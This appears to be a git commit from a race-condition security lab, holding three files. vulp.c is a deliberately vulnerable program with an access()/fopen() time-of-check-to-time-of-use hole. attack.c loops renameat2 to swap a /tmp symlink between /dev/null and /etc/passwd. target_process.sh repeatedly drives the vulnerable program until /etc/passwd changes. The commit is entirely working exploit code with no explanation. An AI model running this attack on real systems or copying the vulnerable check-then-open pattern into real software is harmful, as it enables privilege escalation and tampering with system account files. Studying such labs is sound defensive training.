first commit

attack.c

@@ -0,0 +1,13 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+int main()
+{
+	unsigned int flags = RENAME_EXCHANGE;
+	unlink("/tmp/XYZ"); symlink("/dev/null", "/tmp/XYZ");
+	unlink("/tmp/ABC"); symlink("/etc/passwd", "/tmp/ABC");
+	while(1){
+	renameat2(0, "/tmp/XYZ", 0, "/tmp/ABC", flags);
+	}
+	return 0;
+}

target_process.sh

@@ -0,0 +1,13 @@
+#!/bin/bash
+
+CHECK_FILE="ls -l /etc/passwd"
+old=$($CHECK_FILE)
+new=$($CHECK_FILE)
+while [ "$old" == "$new" ]  
+do
+   echo "hello" | ./vulp 
+   new=$($CHECK_FILE)
+done
+echo "STOP... The passwd file has been changed"
+
+

vulp.c

@@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int main()
+{
+    char* fn = "/tmp/XYZ";
+    char buffer[60];
+    FILE* fp;
+
+    /* get user input */
+    scanf("%50s", buffer);
+
+    if (!access(fn, W_OK)) {
+        fp = fopen(fn, "a+");
+        if (!fp) {
+            perror("Open failed");
+            exit(1);
+        }
+        fwrite("\n", sizeof(char), 1, fp);
+        fwrite(buffer, sizeof(char), strlen(buffer), fp);
+        fclose(fp);
+    } else {
+        printf("No permission \n");
+    }
+
+    return 0;
+}